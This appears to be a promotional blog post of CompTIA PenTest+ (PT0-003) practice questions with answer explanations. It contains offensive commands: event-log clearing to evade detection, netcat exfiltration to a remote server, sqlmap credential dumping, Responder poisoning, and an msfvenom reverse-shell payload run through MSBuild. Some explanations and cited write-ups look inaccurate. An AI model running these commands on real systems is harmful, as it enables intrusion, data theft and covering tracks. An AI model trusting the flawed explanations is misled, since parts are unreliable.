[Feb 27, 2025] Pass the PT0-003 CompTIA PenTest+ Exam with Free Practice Questions
The PT0-003 CompTIA PenTest+ exam is the latest certification for professionals who are looking to prove their penetration testing skills and knowledge in network security. As cybersecurity threats continue to evolve, the demand for skilled penetration testers has never been higher. The PT0-003 exam validates your ability to plan, conduct, and analyze penetration tests to evaluate security risks.
To succeed in the PT0-003 exam, it’s crucial to have a strong grasp of penetration testing methodologies, tools, and techniques. This post will give you an overview of the exam objectives, followed by sample practice questions to help you test your knowledge.
Free Practice Questions
To help you assess your readiness for the PT0-003 exam, here are some free practice questions:
1.During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence.
Which of the following is the best way for the penetration tester to hide the activities performed?
A. Clear the Windows event logs.
B. Modify the system time.
C. Alter the log permissions.
D. Reduce the log retention settings.
Answer: A
Explanation:
During a penetration test, one of the critical steps for maintaining access and covering tracks is to clear evidence of the attack. Manipulating data to hide activities on an internal server involves ensuring that logs and traces of the attack are removed. Here’s a detailed explanation of why clearing the Windows event logs is the best method for this scenario:
Understanding Windows Event Logs: Windows event logs are a key forensic artifact that records system, security, and application events. These logs can provide detailed information about user activities, system changes, and potential security incidents.
Why Clear Windows Event Logs:
Comprehensive Coverage: Clearing the event logs removes all recorded events, including login attempts, application errors, and security alerts. This makes it difficult for an investigator to trace back the actions performed by the attacker.
Avoiding Detection: Penetration testers clear event logs to ensure that their presence and activities are not detected by system administrators or security monitoring tools. Method to Clear Event Logs:
Use the built-in Windows command line utility wevtutil to clear logs.
For example:
shell
Copy code
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
These commands clear the System, Security, and Application logs, respectively.
Alternative Options and Their Drawbacks:
Modify the System Time: Changing the system time can create confusion but is easily detectable and can be reverted. It does not erase existing log entries.
Alter Log Permissions: Changing permissions might prevent new entries but does not remove existing ones and can alert administrators to suspicious activity.
Reduce Log Retention Settings: This can limit future logs but does not affect already recorded logs
and can be easily noticed by administrators.
Case
Reference: HTB Writeups: Many Hack The Box (HTB) writeups demonstrate the importance of clearing logs post-exploitation to maintain stealth. For example, in the “Gobox” and “Writeup” machines, maintaining a low profile involved managing log data to avoid detection.
Real-World Scenarios: In real-world penetration tests, attackers often clear logs to avoid detection by forensic investigators and incident response teams. This step is crucial during red team engagements and advanced persistent threat (APT) simulations.
In conclusion, clearing Windows event logs is a well-established practice for hiding activities during a penetration test. It is the most effective way to remove evidence of the attack from the system, thereby maintaining stealth and ensuring that the tester’s actions remain undetected.
2.A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement.
Given the following firewall policy:
Action | SRC
| DEST
| —
Block | 192.168.10.0/24: 1-65535 | 10.0.0.0/24: 22 | TCP
Allow | 0.0.0.0/0: 1-65535 | 192.168.10.0/24:443 | TCP
Allow | 192.168.10.0/24: 1-65535 | 0.0.0.0/0:443 | TCP
Block | . | . | *
Which of the following commands should the tester try next?
A. tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
B. gzip /path/to/data && cp data.gz <remote_server> 443
C. gzip /path/to/data && nc -nvlk 443; cat data.gz ‘ nc -w 3 <remote_server> 22
D. tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
Answer: A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are: Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 <
/tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks
port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
3.Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?
A. Latches
B. Pins
C. Shackle
D. Plug
Answer: B
Explanation:
In a pin tumbler lock, the key interacts with a series of pins within the lock cylinder. Here’s a detailed breakdown:
Components of a Pin Tumbler Lock:
Key Pins: These are the pins that the key directly interacts with. The cuts on the key align these pins.
Driver Pins: These are pushed by the springs and sit between the key pins and the springs.
Springs: These apply pressure to the driver pins.
Plug: This is the part of the lock that the key is inserted into and turns when the correct key is used.
Cylinder: The housing for the plug and the pins.
Operation:
When the correct key is inserted, the key pins are pushed up by the key’s cuts to align with the shear line (the gap between the plug and the cylinder).
The alignment of the pins at the shear line allows the plug to turn, thereby operating the lock.
Why Pins Are the Correct Answer
The correct key aligns the key pins and driver pins to the shear line, allowing the plug to turn. If any pin is not correctly aligned, the lock will not open. Illustration in Lock Picking:
Lock picking involves manipulating the pins so they align at the shear line without the key. This demonstrates the critical role of pins in the functioning of the lock.
4.A penetration tester assesses an application allow list and has limited command-line access on the Windows system.
Which of the following would give the penetration tester information that could aid in continuing the test?
A. mmc.exe
B. icacls.exe
C. nltest.exe
D. rundll.exe
Answer: C
Explanation:
When a penetration tester has limited command-line access on a Windows system, the choice of tool is critical for gathering information to aid in furthering the test. Here’s an explanation for each option:
mmc.exe (Microsoft Management Console):
Primarily used for managing Windows and its services. It’s not typically useful for gathering information about the system from the command line in a limited access scenario. icacls.exe:
This tool is used for modifying file and folder permissions. While useful for modifying security settings, it does not directly aid in gathering system information or enumeration. nltest.exe:
This is a powerful command-line utility for network testing and gathering information about domain controllers, trusts, and replication status. Key functionalities include: Listing domain controllers: nltest /dclist:<DomainName>
Querying domain trusts: nltest /domain_trusts
Checking secure channel: nltest /sc_query:<DomainName>
These capabilities make nltest very useful for understanding the network environment, especially in a domain context, which is essential for penetration testing.
rundll.exe:
This utility is used to run DLLs as programs. While it can be used for executing code, it does not provide direct information about the system or network environment.
Conclusion: nltest.exe is the best choice among the given options as it provides valuable information about the network, domain controllers, and trust relationships. This information is crucial for a penetration tester to plan further actions and understand the domain environment.
5.A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers.
Which of the following actions would the tester most likely take?
A. Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.
B. Perform an internal vulnerability assessment with credentials to review the internal attack surface.
C. Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.
D. Perform a full internal penetration test to review all the possible exploits that could affect the systems.
Answer: A
Explanation:
BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization’s security defenses and response mechanisms.
Here’s why option A is the best choice:
Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.
Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client’s security tools comprehensively.
Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of
the security measures in place, including which TTPs were detected, blocked, or went unnoticed.
This information is invaluable for the threat-modeling team to understand the current security
posture and areas for improvement.
Reference from Pentest:
Anubis HTB: This write-up highlights the importance of using controlled tools and methods for testing security mechanisms. BAS tools align with this approach by providing a controlled and systematic way to assess security defenses.
Forge HTB: Emphasizes the use of various testing tools and techniques to simulate real-world attacks and measure the effectiveness of security controls. BAS tools are mentioned as a method to ensure
comprehensive coverage and minimal risk to internal systems.
Conclusion:
Using a BAS tool to test multiple TTPs allows for a thorough and controlled assessment of the client’s security tools’ effectiveness. This approach ensures that the testing is systematic, comprehensive, and minimally disruptive, making it the best choice.
6.As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands.
Which of the following techniques would the penetration tester most likely use to access the sensitive data?
A. Logic bomb
B. SQL injection
C. Brute-force attack
D. Cross-site scripting
Answer: B
Explanation:
SQL injection (SQLi) is a technique that allows attackers to manipulate SQL queries to execute arbitrary commands on a database. It is one of the most common and effective methods for accessing sensitive data in internal applications that accept unexpected user inputs.
Here’s why option B is the most likely technique:
Arbitrary Command Execution: The question specifies that the internal application accepts unexpected user inputs leading to arbitrary command execution. SQL injection fits this description as it exploits vulnerabilities in the application’s input handling to execute unintended SQL commands on the database.
Data Access: SQL injection can be used to extract sensitive data from the database, modify or delete records, and perform administrative operations on the database server. This makes it a powerful technique for accessing sensitive information.
Common Vulnerability: SQL injection is a well-known and frequently exploited vulnerability in web
applications, making it a likely technique that a penetration tester would use to exploit input
handling issues in an internal application.
Reference from Pentest:
Luke HTB: This write-up demonstrates how SQL injection was used to exploit an internal application and access sensitive data. It highlights the process of identifying and leveraging SQL injection vulnerabilities to achieve data extraction.
Writeup HTB: Describes how SQL injection was utilized to gain access to user credentials and further
exploit the application. This example aligns with the scenario of using SQL injection to execute arbitrary commands and access sensitive data.
Conclusion:
Given the nature of the vulnerability described (accepting unexpected user inputs leading to arbitrary command execution), SQL injection is the most appropriate and likely technique that the
penetration tester would use to access sensitive data. This method directly targets the input handling mechanism to manipulate SQL queries, making it the best choice.
7.A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees.
Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?
A. Smishing
B. Impersonation
C. Tailgating
D. Whaling
Answer: A
Explanation:
When a penetration tester identifies an exposed corporate directory containing first and last names and phone numbers, the most effective attack technique to pursue would be smishing. Here’s why: Understanding Smishing:
Smishing (SMS phishing) involves sending fraudulent messages via SMS to trick individuals into revealing personal information or performing actions that compromise security. Since the tester has access to phone numbers, this method is directly applicable.
Why Smishing is Effective:
Personalization: Knowing the first and last names allows the attacker to personalize the messages, making them appear more legitimate and increasing the likelihood of the target responding. Immediate Access: People tend to trust and respond quickly to SMS messages compared to emails, especially if the messages appear urgent or important. Alternative Attack Techniques:
Impersonation: While effective, it generally requires real-time interaction and may not scale well across many targets.
Tailgating: This physical social engineering technique involves following someone into a restricted area and is not feasible with just names and phone numbers.
Whaling: This targets high-level executives with highly personalized phishing attacks. Although effective, it is more specific and may not be suitable for the broader set of employees in the directory.
8.A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings,
and high-level statements.
Which of the following sections of the report would most likely contain this information?
A. Quality control
B. Methodology
C. Executive summary
D. Risk scoring
Answer: C
Explanation:
In the final report for a penetration test engagement, the section that most likely contains details on the impact, overall security findings, and high-level statements is the executive summary.
Here’s why:
Purpose of the Executive Summary:
It provides a high-level overview of the penetration test findings, including the most critical issues, their impact on the organization, and general recommendations.
It is intended for executive management and other non-technical stakeholders who need to understand the security posture without delving into technical details. Contents of the Executive Summary:
Impact: Discusses the potential business impact of the findings.
Overall Security Findings: Summarizes the key vulnerabilities identified during the engagement. High-Level Statements: Provides strategic recommendations and a general assessment of the security posture.
Comparison to Other Sections:
Quality Control: Focuses on the measures taken to ensure the accuracy and quality of the testing process.
Methodology: Details the approach and techniques used during the penetration test.
Risk Scoring: Provides detailed risk assessments and scoring for specific vulnerabilities but does not offer a high-level overview suitable for executives.
9.A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?
A. A generative AI assistant
B. The customer’s designated contact
C. A cybersecurity industry peer
D. A team member
Answer: D
Explanation:
Before sharing a report with a client, it is crucial to have it reviewed to ensure accuracy, clarity, and completeness. The best choice for this review is a team member.
Here’s why: Internal Peer Review:
Familiarity with the Project: A team member who worked on the project or is familiar with the methodologies used can provide a detailed and context-aware review.
Quality Assurance: This review helps catch any errors, omissions, or inconsistencies in the report
before it reaches the client.
Alternative Review Options:
A Generative AI Assistant: While useful for drafting and checking for language issues, it may not fully understand the context and technical details of the penetration test.
The Customer’s Designated Contact: Typically, the client reviews the report after the internal review to provide their perspective and request clarifications or additional details.
A Cybersecurity Industry Peer: Although valuable, this option might not be practical due to confidentiality concerns and the peer’s lack of specific context regarding the engagement.
In summary, an internal team member is the most suitable choice for a thorough and contextually accurate review before sharing the report with the client.
10.During an assessment, a penetration tester exploits an SQLi vulnerability.
Which of the following commands would allow the penetration tester to enumerate password hashes?
A. sqlmap -u www.example.com/?id=1 –search -T user
B. sqlmap -u www.example.com/?id=1 –dump -D accounts -T users -C cred
C. sqlmap -u www.example.com/?id=1 –tables -D accounts
D. sqlmap -u www.example.com/?id=1 –schema –current-user –current-db
Answer: B
Explanation:
To enumerate password hashes using an SQL injection vulnerability, the penetration tester needs to extract specific columns from the database that typically contain password hashes. The –dump command in sqlmap is used to dump the contents of the specified database table.
Here’s a breakdown of the options:
Option A: sqlmap -u www.example.com/?id=1 –search -T user
The –search option is used to search for columns and not to dump data. This would not enumerate password hashes.
Option B: sqlmap -u www.example.com/?id=1 –dump -D accounts -T users -C cred
This command uses –dump to extract data from the specified database accounts, table users, and column cred. This is the correct option to enumerate password hashes, assuming cred is the column containing the password hashes.
Option C: sqlmap -u www.example.com/?id=1 –tables -D accounts
The –tables option lists all tables in the specified database but does not extract data.
Option D: sqlmap -u www.example.com/?id=1 –schema –current-user –current-db
The –schema option provides the database schema information, and –current-user and –current-db
provide information about the current user and database but do not dump data.
Reference from Pentest:
Writeup HTB: Demonstrates using sqlmap to dump data from specific tables to retrieve sensitive information, including password hashes.
Luke HTB: Shows the process of exploiting SQL injection to extract user credentials and hashes by dumping specific columns from the database.
11.During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine.
Which of the following tools should the penetration tester use to continue the attack?
A. Responder
B. Hydra
C. BloodHound
D. CrackMapExec
Answer: D
Explanation:
When a penetration tester obtains an NTLM hash from a legacy Windows machine, they need to use
a tool that can leverage this hash for further attacks, such as pass-the-hash attacks, or for cracking the hash.
Here’s a breakdown of the options:
Option A: Responder
Responder is primarily used for poisoning LLMNR, NBT-NS, and MDNS to capture hashes, but not for leveraging NTLM hashes obtained post-exploitation.
Option B: Hydra
Hydra is a password-cracking tool but not specifically designed for NTLM hashes or pass-the-hash attacks.
Option C: BloodHound
BloodHound is used for mapping out Active Directory relationships and identifying potential attack paths but not for using NTLM hashes directly.
Option D: CrackMapExec
CrackMapExec is a versatile tool that can perform pass-the-hash attacks, execute commands, and more using NTLM hashes. It is designed for post-exploitation scenarios involving NTLM hashes. Reference from Pentest:
Forge HTB: Demonstrates the use of CrackMapExec for leveraging NTLM hashes to gain further access within a network.
Horizontall HTB: Shows how CrackMapExec can be used for various post-exploitation activities, including using NTLM hashes to authenticate and execute commands.
Conclusion:
Option D, CrackMapExec, is the most suitable tool for continuing the attack using an NTLM hash. It supports pass-the-hash techniques and other operations that can leverage NTLM hashes effectively.
12.A penetration tester needs to collect information over the network for further steps in an internal assessment.
Which of the following would most likely accomplish this goal?
A. ntlmrelayx.py -t 192.168.1.0/24 -1 1234
B. nc -tulpn 1234 192.168.1.2
C. responder.py -I eth0 -wP
D. crackmapexec smb 192.168.1.0/24
Answer: C
Explanation:
To collect information over the network, especially during an internal assessment, tools that can capture and analyze network traffic are essential. Responder is specifically designed for this purpose, and it can capture NTLM hashes and other credentials by poisoning various network protocols.
Here’s a breakdown of the options:
Option A: ntlmrelayx.py -t 192.168.1.0/24 -1 1234
ntlmrelayx.py is used for relaying NTLM authentication but not for broad network information collection.
Option B: nc -tulpn 1234 192.168.1.2
Netcat (nc) is a network utility for reading from and writing to network connections using TCP or UDP but is not specifically designed for comprehensive information collection over a network.
Option C: responder.py -I eth0 -wP
Responder is a tool for LLMNR, NBT-NS, and MDNS poisoning. The -I eth0 option specifies the network interface, and -wP enables WPAD rogue server which is effective for capturing network credentials and other information.
Option D: crackmapexec smb 192.168.1.0/24
CrackMapExec is useful for SMB-related enumeration and attacks but not specifically for broad
network information collection.
Reference from Pentest:
Anubis HTB: Highlights the use of Responder to capture network credentials and hashes during internal assessments.
Horizontall HTB: Demonstrates the effectiveness of Responder in capturing and analyzing network traffic for further exploitation.
13.A penetration tester wants to use the following Bash script to identify active servers on a network:
1 network_addr=”192.168.1″
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo “Host $h is up”
6 else
7 echo “Host $h is down”
8 fi
9 done
Which of the following should the tester do to modify the script?
A. Change the condition on line 4.
B. Add 2>&1 at the end of line 3.
C. Use seq on the loop on line 2.
D. Replace $h with ${h} on line 3.
Answer: C
Explanation:
The provided Bash script is used to ping a range of IP addresses to identify active hosts in a network.
Here’s a detailed breakdown of the script and the necessary modification:
Original Script:
1 network_addr=”192.168.1″
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo “Host $h is up”
6 else
7 echo “Host $h is down”
8 fi
9 done
Analysis:
Line 2: The loop uses {1..254} to iterate over the range of host addresses. However, this notation might not work in all shell environments, especially if not using bash directly or if the script runs in a different shell.
Using seq for Better Compatibility:
The seq command is a more compatible way to generate a sequence of numbers. It ensures the loop
works in any POSIX-compliant shell.
Modified Line 2:
for h in $(seq 1 254); do
This change ensures broader compatibility and reliability of the script.
Modified Script:
1 network_addr=”192.168.1″
2 for h in $(seq 1 254); do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo “Host $h is up”
6 else
7 echo “Host $h is down”
8 fi
9 done
14.A penetration tester is attempting to discover vulnerabilities in a company’s web application.
Which of the following tools would most likely assist with testing the security of the web application?
A. OpenVAS
B. Nessus
C. sqlmap
D. Nikto
Answer: D
Explanation:
When testing the security of a web application, specific tools are designed to uncover vulnerabilities and issues. Here’s an overview of the tools mentioned and why Nikto is the most suitable for this task:
Nikto:
Purpose: Nikto is a web server scanner that performs comprehensive tests against web servers for multiple items, including potentially dangerous files/programs, outdated versions, and other security issues.
Relevance: It is designed specifically for discovering vulnerabilities in web applications, making it the most appropriate choice for a penetration tester targeting a web application.
Comparison with Other Tools:
OpenVAS: A general-purpose vulnerability scanner that targets a wide range of network services and hosts, not specifically tailored for web applications.
Nessus: Similar to OpenVAS, Nessus is a comprehensive vulnerability scanner but is broader in scope and not focused solely on web applications.
sqlmap: This tool is excellent for SQL injection testing but is limited to database vulnerabilities and doesn’t cover the full spectrum of web application security issues.
15.A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services.
Which of the following commands should the tester use?
A. nmap -sU -sW -p 1-65535 example.com
B. nmap -sU -sY -p 1-65535 example.com
C. nmap -sU -sT -p 1-65535 example.com
D. nmap -sU -sN -p 1-65535 example.com
Answer: C
Explanation:
To find the state of both TCP and UDP ports using Nmap, the appropriate command should combine
both TCP and UDP scan options:
Understanding the Options:
-sU: Performs a UDP scan.
-sT: Performs a TCP connect scan.
Command Explanation
Command: nmap -sU -sT -p 1-65535 example.com
This command will scan both TCP and UDP ports from 1 to 65535 on the target example.com. Combining -sU and -sT ensures that both types of services are scanned. Comparison with Other Options:
-sW: Initiates a TCP Window scan, not relevant for identifying the state of TCP and UDP services.
-sY: Initiates a SCTP INIT scan, not relevant for this context.
-sN: Initiates a TCP Null scan, which is not used for discovering UDP services.
16.A tester plans to perform an attack technique over a compromised host.
The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.
Which of the following commands would most likely be used by the tester to continue with the attack on the host?
A. regsvr32 /s /n /u C:\evil.xml
B. MSBuild.exe C:\evil.xml
C. mshta.exe C:\evil.xml
D. AppInstaller.exe C:\evil.xml
Answer: B
Explanation:
The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:
Understanding MSBuild.exe:
Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.
Command Usage:
Command: MSBuild.exe C:\evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution. Comparison with Other Commands:
regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code. mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.
AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.
Visit full PT0-003 study material or practice exam to get access to a complete set of practice questions, study guides, and other tools to ensure you’re fully prepared to pass the CompTIA PenTest+ exam on your first attempt!
LEAVE A COMMENT